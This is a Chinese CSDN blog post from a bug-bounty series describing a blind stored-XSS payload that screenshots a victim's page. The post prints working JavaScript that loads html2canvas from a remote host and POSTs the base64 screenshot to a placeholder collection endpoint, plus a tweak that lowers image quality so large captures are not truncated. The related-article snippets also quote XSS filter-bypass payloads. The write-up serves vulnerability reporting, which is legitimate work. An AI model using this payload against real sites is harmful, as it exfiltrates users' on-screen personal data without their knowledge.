12. xss bypass xss截屏

最新推荐文章于 2023-03-01 18:42:14 发布
最新推荐文章于 2023-03-01 18:42:14 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: SRC挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/113114923
版权

layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

前言

该篇记录为记录实际的src过程第12篇小文章,内容为某网站的xssbypass。

盲打存储xss

一般的存储xss,会遇到两种情况:

  1. 可以公网访问,则视后台的敏感程度定危害,一般可到高危。
  2. 不可以公网访问,打到cookie,如果没有证明危害,一般会给中危。
  3. 可蠕虫的用户xss,高危
  4. 不可蠕虫的普通的用户级别存储xss,中危

提升危害的方法

对于第二种情况,能想到的提升危害的方法就是xss截图。

document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");

window.onload = function () {
    html2canvas(document.body, {
        onrendered: function (canvas) {

            //下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
            xhr = function () {
                var request = false;
                if (window.XMLHttpRequest) {
                    request = new XMLHttpRequest();
                } else if (window.ActiveXObject) {
                    try {
                        request = new window.ActiveXObject('Microsoft.XMLHTTP');
                    } catch (e) {

                    }
                }

                return request;
            }();

            request = function (method, src, argv, content_type) {
                xhr.open(method, src, false);
                if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
                xhr.send(argv); //发送POST数据
                return xhr.responseText;
            };

            attack_a = function () {
                var src = "https://xxxx/xss.php?do=api&id={projectId}"; //post接收地址
                var argv_0 = "'&screenshot=" + canvas.toDataURL(); //post字段名称为screenshot
                request("POST", src, argv_0, "application/x-www-form-urlencoded");
            };

            attack_a();


        }
    });
}

但是这种平台遇到的问题就是,有时候图片数据过大,转为base64传过来的时候会少数据。
这个时候就可以减少像素传输的方式将完整的图片传过来。

解决办法

var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);

最后的效果看,还是能够清楚的看到用户的数据的。

后话

xxxxx

_HWHXY
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
xss.js.zip
07-29
xss是一个用于对用户输入的内容进行过滤,以避免遭受 XSS 攻击的模块,可通过白名单来控制允许的标签及相关的标签属性,另外还提供了一系列的接口以便用户扩展。
2.xss
weixin_41826065的博客
12-07 1330
XSS
xss挑战之旅less5-less10,步骤加截图
weixin_56513549的博客
02-17 265
5.欢迎来到level5 6.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT> 7.双写绕过 "><scscriptript>alert(7)<sriscriptpt> "><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>// 8."script"转换为"scr_ipt","on"转换为"o_n","src"转换.
遭遇 XSS 跨站脚本攻击?稳住,这些方法可保你渡劫 | 附代码、图解
CSDN资讯
08-19 3576
作者 | 杨秀璋责编 | 夕颜出品 | CSDN博客本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了...
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
【白帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1530
【白帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
3-12xss防范措施及href和js输出点的案例演示
山兔的博客
04-29 1165
XSS常见防范措施 总的原则:输入做过滤,输出做转义  过滤:根据业务需求进行过滤,比如输入点要求输入手机号,在后端写一个逻辑,只允许输入手机号格式的数字。  转义:所有输出到前端的数据都根据输出点进行转义,比如输出到html中进行html实体转义,输入到JS里面的进行js转义。 案例演示 我们选择xss之href输出,这个地方,我们直接看源码 如果你输入的内容,不是百度,它会把你输入的内容,用htmlspecialchars()进行处理,同时它这里也用了ENT_QUOTES这么个类型,这意味着’"&
教主Kali与Python黑客.6.WEB攻击.3.XSS
10-14
教主Kali与Python黑客.6.WEB攻击.3.XSS
36-36.XSS跨站脚本攻击课程介绍.mp4
最新发布
05-10
36-36.XSS跨站脚本攻击课程介绍.mp4
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全问题,它发生在攻击者通过在网页中注入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而盗取用户数据或者控制用户浏览器的行为。XSS攻击主要分为...
【web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 2361
XSS-pikachu
Pikachu-----Cross-Site Scripting(XSS
m0_65712192的博客
12-17 854
Pikachu-----Cross-Site Scripting(XSS
pikachu之xss
miaositekali的博客
03-01 107
pikachu的xss漏洞
Pikachu靶场之XSS漏洞详解
m0_61506558的博客
08-20 614
1、反射型xss(get)
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2483
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
2020-11-22
qq_51370368的博客
11-24 360
实验三 XSS和SQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户
XSS部分:利用Beef劫持被攻击者客户端浏览器
AZXYZNPY的博客
11-21 190
原理:此类XSS漏洞是指,用户输入的数据(恶意代码)可以“存储”在服务端,只要有人访问这个包含有存储XSS代码的页面,XSS脚本就会在他们的浏览器中执行,这种XSS具有很强的稳定性。,截图。3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);被攻击者:访问留言簿网站,浏览器被劫持。
3. XSS事件触发绕过
08-03
XSS事件触发绕过是指绕过XSS防御机制,成功触发XSS攻击。根据引用[1]和引用[2]的内容,可以得出一些绕过XSS防御的方法。其中一种方法是改变请求方式,将POST请求改为GET请求,然后通过访问URL来执行恶意代码。另一种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值